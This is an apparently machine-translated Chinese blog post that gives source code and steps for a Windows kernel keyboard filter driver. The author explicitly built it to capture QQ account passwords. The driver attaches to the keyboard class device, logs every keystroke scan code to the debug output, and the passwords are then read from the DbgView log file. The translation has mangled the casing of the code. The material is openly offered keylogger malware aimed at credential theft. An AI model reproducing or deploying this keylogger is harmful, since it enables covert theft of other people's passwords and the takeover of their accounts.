Qq password record program source code

I recently looked at C ++ and wrote a program to play with it. Because the user-mode code is difficult to intercept the QQ password, write a hierarchical keyboard driver. The test results are acceptable.

Development Environment vs2008 winddk ddkwizard WindowsXP dbgview

Implementation Method

1. Mount the filter driver to the keyboard driver.

2. Set completion routine

3. output the Keyboard Scan code to debugview through kdprint

4. Read the keyboard keys from the log file of debugview.

Code

1. Mount the filter driver to keyboardclass0.

Pfile_object fileojbect;
Pdevice_object deviceobject;
Unicode_string devicename;
Pdevice_extension PDX;
Pdevice_object filterdeviceobject;
Pdevice_object targetdevice;
Fileojbect = NULL;
Rtlinitunicodestring (& devicename, l "\ device \ keyboardclass0 ");
Status = iogetdeviceobjectpointer (& devicename, file_all_access, & fileojbect, & deviceobject );
Pdodeviceobj-> flags | = do_buffered_io;
PDX = (pdevice_extension) pdodeviceobj-> deviceextension;
PDX-> pdevice = pdodeviceobj;
PDX-> ustrdevicename = usdevicename;
Filterdeviceobject = (pdevice_extension) driverobject-> deviceobject-> deviceextension)-> pdevice;
Targetdevice = ioattachdevicetodevicestack (filterdeviceobject, deviceobject );
(Pdevice_extension) driverobject-> deviceobject-> deviceextension)-> targetdevice = targetdevice;
Filterdeviceobject-> devicetype = targetdevice-> devicetype;
Filterdeviceobject-> characteristics = targetdevice-> characteristics;
Filterdeviceobject-> flags & = ~ Do_device_initializing;
Filterdeviceobject-> flags | = (targetdevice-> flags & (do_direct_io | do_buffered_io ));
Obdereferenceobject (fileojbect );
Return STATUS_SUCCESS;

2. Set completion routine

Pdevice_extension PDX;
PDX = (pdevice_extension) deviceobject-> deviceextension;
Iocopycurrentirpstacklocationtonext (IRP );
Iosetcompletionroutine (IRP, myiocompletion, null, true );
Ntstatus status = iocalldriver (PDX-> targetdevice, IRP );
Return status;

3. Output scan code for keyboard buttons

Ntstatus myiocompletion (in pdevice_object deviceobject, in pirp, in pvoid context)
{
If (nt_success (IRP-> iostatus. Status ))
{
Pkeyboard_input_data keys = (pkeyboard_input_data) IRP-> associatedirp. systembuffer;
If (keys-> flags = 0x0001 | keys-> flags = 0x0003)
Kdprint ("% 02x", keys-> makecode ));
}
If (IRP-> pendingreturned)
{
Iomarkirppending (IRP );
}
Return STATUS_SUCCESS;
}

Procedure

1. Install the driver

Use drivermonitor to load and run the driver1.sys driver File

2. Open dbgview. When you press the key, you can see the keyboard scan code recorded in dbgview.

3. Select log file record in dbgview to process the log file and obtain the QQ password.

Even C ++ cainiao, welcome the great gods to criticize the lack of education a lot of Ah a lot of exchange Thank you mailbox 328452421@qq.com

Source http://download.csdn.net/detail/xiaoxiao108/4303441